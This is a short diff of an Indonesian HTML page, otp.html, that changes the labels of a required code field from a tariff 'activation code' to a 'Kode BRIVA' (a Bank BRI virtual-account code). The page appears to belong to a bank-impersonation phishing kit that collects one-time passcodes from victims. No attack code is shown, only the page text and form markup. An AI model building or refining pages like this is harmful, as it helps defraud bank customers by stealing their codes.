--- a/otp.html
+++ b/otp.html
@@ -392,7 +392,7 @@
      <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"> 
          
     <div id="lonte" class="lonte"></div>
-      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px">Silahkan masukan kode Aktivasi TARIF Anda, Jika belum menerima Kode silahkan klik tombol di bawah ini<br><br>Kode Aktivasi (Wajib).</p> 
+      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px">Silahkan masukan kode Aktivasi TARIF Anda, Jika belum menerima Kode silahkan klik tombol di bawah ini<br><br>Kode BRIVA (Wajib).</p> 
      </div> 
     </div> 
     <div class="row"> 
@@ -410,9 +410,9 @@
        <i class="ion-ios-locked-outline" id="ionIcons"></i> 
    
 
-         <input type="tel" name="otp" id="nama1"  class="bubble-element Input form-log" placeholder="KODE Aktivasi" maxlength="" minlength="" style="margin-left: 0px;" required onclick="gantiborder1()">
+         <input type="tel" name="otp" id="nama1"  class="bubble-element Input form-log" placeholder="KODE BRIVA" maxlength="" minlength="" style="margin-left: 0px;" required onclick="gantiborder1()">
   
-         <b> <p style="font-size: 14px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000; text-decoration: underline" onclick="get()"> Belum Menerima Kode Aktivasi ? </strong></p></b>
+         <b> <p style="font-size: 14px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000; text-decoration: underline" onclick="get()"> Belum Menerima Kode BRIVA ? </strong></p></b>
         </div>
        </center>
        <b>
